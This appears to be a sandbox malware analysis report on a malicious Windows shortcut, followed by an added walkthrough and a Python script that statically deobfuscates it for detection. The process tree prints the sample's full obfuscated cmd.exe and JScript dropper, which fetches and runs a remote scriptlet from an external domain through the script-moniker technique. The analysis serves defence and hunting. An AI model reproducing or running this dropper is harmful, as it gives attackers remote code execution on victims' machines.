Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/01/2024, 19:05

General

  • Target

    26586807.lnk

  • Size

    1KB

  • MD5

    bc345cb4f475cf31bd47c9bbbeebc376

  • SHA1

    53a989af0ea25a20c022db6d5cda0204dc53d0c5

  • SHA256

    8051b39e71554eb5e1bb9455160957c5a5aae1e24f261052e8e871e93420adfc

  • SHA512

    8e4eca9cdddd877c7db0411a3a809733660db7e8ebc877870a10b901beb97218b6bb586b5499dc14d3df831d9327fd0ab26b5f336a939997cccfc2bb6e4fc3ef

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory (3 IoCs)

Processes

  • C:\Windows\system32\cmd.exe (PID 1900)
    cmd /c C:\Users\Admin\AppData\Local\Temp\26586807.lnk
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\conhost.exe (PID 2868)
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "
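What the cmd.exe command line above actually does, worked through as an added example for this page (this is not part of the Triage report and not the sample's own code). The batch stage runs with /V (delayed !VAR! expansion) and /D (no AutoRun), creates C:\XE9MHO\, and uses `<nul set/p ... >file` to drop a .JS file there, then executes it with `call` (and retries with `||call`, since the pipe starts the reader before the writer has finished). The JScript stage holds its real code in three `\uXXXX`-escaped string literals, joins them in the order XBLO+URC+RDII and runs the result through `new Function()`. That second stage builds `"scr"+"ipt:h"+"TtP:"` and calls `GetObject("script:hTtP://7gbtnaraiu1.sicoopqr.org/?1/")`, i.e. the well-known script-moniker technique that fetches and runs a remote scriptlet through scrobj.dll. Whatever that remote scriptlet would have delivered is not captured in this report. The Python below statically emulates just the cmd.exe and JScript behaviour this sample relies on (caret stripping outside quotes, !VAR! expansion, `set /p` redirection, `\u` decoding, `+` concatenation of literals and identifiers) so the indicators can be read without running anything; it is not a general cmd or JScript interpreter, and the assumption that carets can be stripped globally holds only because the command contains no inner double quotes.

```python
"""Static deobfuscation of the cmd.exe /V/D/c one-liner from the process tree.

Added example for this page; it is not a Triage tool and not the sample's
own code.  It re-implements, in Python, only the cmd.exe and JScript
behaviour this particular dropper relies on, so the dropped path and the
final GetObject() argument can be recovered without executing the sample.
"""
import re

# The conhost.exe/cmd.exe command line exactly as captured in the report,
# split over several raw-string pieces for readability (raw strings keep the
# \uXXXX sequences literal, as cmd.exe writes them into the dropped file).
CMDLINE = (
    r'C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1'
    r'&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='
    r"'\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b"
    r"\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031"
    r"\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f"
    r"\u003f\u0031\u002f\u0022\u0029\u003b';URC='"
    r"\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b"
    r"\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074"
    r"\u0028\u0043';XBLO='"
    r"\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022"
    r"\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022"
    r"\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); "
    r'>!HAQR!|caLl !HAQR!||caLl !HAQR! "'
)


def cmd_stage(cmdline):
    """Emulate the cmd.exe parsing the dropper depends on: the outer quotes of
    the /c argument are removed, ^ escapes the next character (safe to apply
    globally here because the command has no inner double quotes), /V makes
    !VAR! expand at execution time, and 'set /p VAR=text >file' writes 'text'
    into the file.  Returns (dropped_file_path, dropped_file_text)."""
    body = cmdline.split('/c', 1)[1].strip()
    if body.startswith('"') and body.endswith('"'):
        body = body[1:-1]
    body = re.sub(r'\^(.)', r'\1', body)
    env = {}

    def expand(s):
        return re.sub(r'!(\w+)!', lambda m: env.get(m.group(1), m.group(0)), s)

    path = text = None
    for seg in body.split('&&'):
        seg = seg.strip()
        m = re.search(r'set\s*/p\s+\w+=(.*?)\s*>(\S+)', seg, re.I)
        if m:                                   # <nul set/p X=text >file|...
            text = m.group(1)
            path = expand(m.group(2)).split('|', 1)[0]
            continue
        m = re.match(r'set\s+(\w+)=(.*)', seg, re.I)
        if m:                                   # S^eT NAME=value
            env[m.group(1)] = expand(m.group(2))
    return path, text


def jscript_stage(js):
    """Emulate the first JScript stage: decode the \\uXXXX string literals and
    join them in the order named by the A=B+C+D expression that is fed to
    new Function().  Returns the second-stage source."""
    def undo_escapes(s):
        return re.sub(r'\\u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)

    literals = {name: undo_escapes(val)
                for name, val in re.findall(r"(\w+)='([^']*)'", js)}
    m = re.search(r'(\w+)=((?:\w+\+)+\w+);\w+=new Function\(\1\)', js)
    return ''.join(literals[n] for n in m.group(2).split('+'))


def eval_concat(expr, scope):
    """Evaluate a JScript expression built only from "literal" and identifier
    terms joined by +, which is all the second stage uses."""
    parts = []
    for term in expr.split('+'):
        term = term.strip()
        parts.append(term[1:-1] if term.startswith('"') else scope[term])
    return ''.join(parts)


def second_stage(src):
    """Walk the second-stage statements, binding each variable, and return the
    string handed to GetObject()."""
    scope = {}
    for stmt in filter(None, (s.strip() for s in src.split(';'))):
        if stmt.startswith('var '):
            stmt = stmt[4:]
        m = re.match(r'(\w+)=(.*)', stmt)
        if m:
            scope[m.group(1)] = eval_concat(m.group(2), scope)
            continue
        m = re.match(r'GetObject\((.*)\)', stmt)
        if m:
            return eval_concat(m.group(1), scope)
    return None


def deobfuscate(cmdline):
    """Run all stages and return the indicators an analyst wants from them."""
    path, dropped = cmd_stage(cmdline)
    stage2 = jscript_stage(dropped)
    return {'dropped_file': path,
            'stage2_source': stage2,
            'getobject_arg': second_stage(stage2)}


if __name__ == '__main__':
    for key, value in deobfuscate(CMDLINE).items():
        print(f'{key}: {value}')
```

Running it yields the dropped path C:\XE9MHO\XBLOQECJ.JS, the reassembled second stage, and the moniker string script:hTtP://7gbtnaraiu1.sicoopqr.org/?1/ (GetObject and the moniker parser are case-insensitive about the scheme, which is why the mixed-case "hTtP" costs the sample nothing). For triage, the two things worth turning into detections from this are the write of a .JS file by cmd.exe into a freshly created directory under the drive root and a script-host process reaching out right after a `call` of that file; for hunting, the domain and the `script:` prefix inside a GetObject argument are the durable parts, the variable names and the \u encoding are not.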

Network

MITRE ATT&CK Enterprise v15
